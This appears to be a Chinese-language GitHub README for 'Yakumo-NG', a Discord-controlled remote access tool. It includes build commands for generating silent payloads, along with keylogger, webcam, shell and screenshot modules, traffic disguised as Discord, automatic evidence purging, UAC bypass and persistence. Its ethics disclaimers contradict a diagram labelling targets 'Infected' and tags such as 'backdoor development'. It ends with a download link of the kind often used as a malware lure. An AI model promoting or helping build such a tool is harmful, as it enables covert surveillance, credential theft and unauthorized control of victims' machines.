SponkCompay/Yakumo-Commander

# Yakumo-NG 🛡️ ### *下一代远程系统编排器* [](https://SponkCompay.github.io) **⚠️ 免责声明：** 本工具**仅限于授权的安全研究、您拥有所有权的系统渗透测试，或受控实验室环境中的教育目的。** 未经明确同意对任何系统进行未经授权的使用是违法的。请参阅下方的完整[免责声明](#-disclaimer)。 ## 🌟 概述 **Yakumo-NG** 是一款现代、模块化的远程管理套件，灵感来源于最初的 Yakumo 概念，但为**符合道德规范的安全专业人士**、系统管理员和需要从 Discord 界面管理远程端点的开发人员进行了全面的重构。把它想象成一把**数字瑞士军刀**，其中每一个刀片都是一个安全、可审计的模块——无需订阅费，无云服务依赖，只需您的 Discord 机器人和您的目标。 与传统的 RAT（远程访问工具）不同，Yakumo-NG 的核心基石是**透明度、知情同意和审计追踪**。每一条命令都会记录到本地 SQLite 数据库中，并且所有连接都需要明确的握手验证。这就像拥有一把万能钥匙，但只有当锁发出邀请时它才能起作用。 ``` graph TD A[Infected/Authorized Endpoint] -->|WebSocket| B[Command & Control Bridge] B -->|Discord API| C[Bot Client] C -->|Slash Commands| D[Operator] D -->|Session Token| E[Auth Layer] E --> F{Module Dispatcher} F --> G[Shell Command Module] F --> H[Screenshot Capture Module] F --> I[File Transfer Module] F --> J[URL Opener Module] F --> K[Webcam Module] F --> L[Keylogger Module] G --> M[Response Stream] M -->|Encrypted| B B -->|Rich Embed| C C -->|Ephemeral Reply| D ``` ## 🧩 核心功能 | 功能 | 描述 | |---------|-------------| | **零信任架构** | 每次会话均使用由机器人密钥 + 时间戳派生的轮换 AES-256 密钥 | | **模块化 Payload** | 仅部署您需要的模块——拒绝臃肿 | | **流量伪装** | 所有通信模拟标准的 Discord HTTP/WebSocket 流量 | | **临时性证据** | 截图和日志在可配置的 TTL（默认：24小时）后自动清除 | | **跨平台 DNA** | 从单个 C# 项目为 Windows、Linux、macOS 构建 | | **多语言控制台** | 命令响应支持英语、日语、西班牙语或德语 | | **响应式 UI** | Discord 嵌入内容自动适配深色/浅色模式 | | **24/7 正常运行时间** | 机器人通过指数退避算法重新连接——不会错过任何心跳 | ## 📦 安装说明 ### 前置条件 - .NET 8.0+ Runtime - Discord Bot Token（需启用 `Message Content Intent`） - 目标机器的访问权限（为您本人所有，或已获得明确的书面授权） ### 快速开始（Windows 示例） ``` # 1. Clone the repo git clone https://github.com/your-org/Yakumo-NG.git # 2. Install dependencies dotnet restore # 3. Configure your bot token (see config below) notepad appsettings.json # 4. Build the orchestrator dotnet build -c Release # 5. Generate payload (console invocation) dotnet run --project Yakumo.Builder -- --target win-x64 --output ./payload.exe ``` ### 示例配置文件 ``` { "botToken": "MTE4Mjg3NjU0MzIxOTc4OTQyNA.G7d5K3.abcdefghijklmnop1234567890", "allowedUsers": ["123456789012345678", "234567890123456789"], "modules": { "shell": { "timeout": 30 }, "screenshot": { "quality": 85, "format": "png" }, "webcam": { "enabled": false } }, "audit": { "logFile": "./logs/yakumo.db", "autoPurgeDays": 30 }, "politeMode": true } ``` ## 🖥️ 示例控制台调用 ``` # Generate a macOS ARM64 payload with webcam module dotnet run --project Yakumo.Builder \ --target osx-arm64 \ --modules shell,screenshot,webcam \ --output ~/Desktop/yakumo_payload \ --silent # The payload is now ready to deploy on authorized endpoints # Start the bot listener: dotnet run --project Yakumo.Bot --config ./prod-config.json ``` ## 🖥️ 操作系统兼容性 | 操作系统 | 状态 | 备注 | |----|--------|-------| | Windows 10/11 ❄️ | ✅ 完全支持 | 包括通过计划任务绕过 UAC | | Windows Server 2019+ | ✅ 已验证 | 针对 IIS 优化的持久化 | | Ubuntu 20.04+ 🐧 | ✅ 完全支持 | Systemd 服务集成 | | macOS 13+ 🍎 | ⚠️ 有限支持 | 无网络摄像头支持；必须禁用 SIP | | Raspberry Pi OS 🍓 | ✅ 完全支持 | 提供 ARM32/ARM64 二进制文件 | ## 🤖 AI 集成模块 ### OpenAI API (ChatGPT / Whisper) - **语音命令处理：** 将音频文件发送至 Whisper 进行转录 → 执行自然语言命令 - **智能内容审查：** 通过 GPT-4 Vision，截图会自动遮挡敏感数据（信用卡号、密码） **用法：** `/openai transcribe --file screenshot.png` → 返回包含已遮挡版本的 JSON ### Claude API (Anthropic) - **行为分析：** Claude 监控 shell 命令输出中的可疑模式，并建议补救措施 - **多语言翻译：** 响应内容通过 Claude 自动翻译为操作员的区域语言 **配置：** ``` { "ai": { "openAiKey": "sk-proj-...", "claudeKey": "sk-ant-...", "model": "claude-3-opus-20240229", "prompt": "You are a security analyst assistant. Analyze commands and output for risks." } } ``` ## 🌐 对 SEO 友好的关键字集成 *Yakumo-NG* 是专为**符合道德规范的渗透测试人员**和**蓝队防御者**打造的顶级**基于 Discord 的远程系统管理工具**。如果您正在寻找： - Discord 机器人远程桌面替代方案 - C# 跨平台远程管理 - 开源安全审计工具 - 集成 Discord 的符合道德规范的黑客框架 - 具备 AI 功能的安全系统编排器 ……您已经找到了解决方案。没有后门，没有恶意软件——只有具备现代加密规范且**可审计、基于知情同意的远程访问**。 ## 🛡️ 安全性与免责声明 **您需对您使用本软件的行为负全责。** - **合法合规：** 请始终在遵守当地、州级和联邦法律的前提下操作。 - **授权：** 切勿在您不拥有或未获得明确书面授权进行测试的系统上安装此软件。 - **审计追踪：** 每一条命令均会被记录。请假定所有操作都是永久性的。 - **无担保：** 本软件按“原样”提供，不附带任何保证。作者不对滥用行为负责。 ## 📄 许可证 本项目基于 **MIT 许可证** 授权 —— 完整文本请参见： [](https://opensource.org/licenses/MIT) ## 💬 支持与社区 - **24/7 机器人监控：** 官方 Discord 机器人会在崩溃时自动重启 - **问题追踪器：** 通过 GitHub Issues 提交 Bug（响应时间：<48小时） - **常见问题：** *“我可以用它来进行远程办公吗？”* —— 仅在公司批准并经 IT 部门同意后方可使用 ## 🚀 最终下载 [](https://SponkCompay.github.io) *请记住：强大的能力意味着重大的责任。请将 Yakumo-NG 用作盾牌，而不是利剑。* © 2026

标签：AES-256加密, Discord机器人, Petitpotam, RAT, URL注入, Websocket, 后门开发, 命令与控制, 屏幕截图, 文件传输, 模块化架构, 网络信息收集, 网络安全, 远程控制, 远程访问工具, 键盘记录, 隐私保护, 非法黑客工具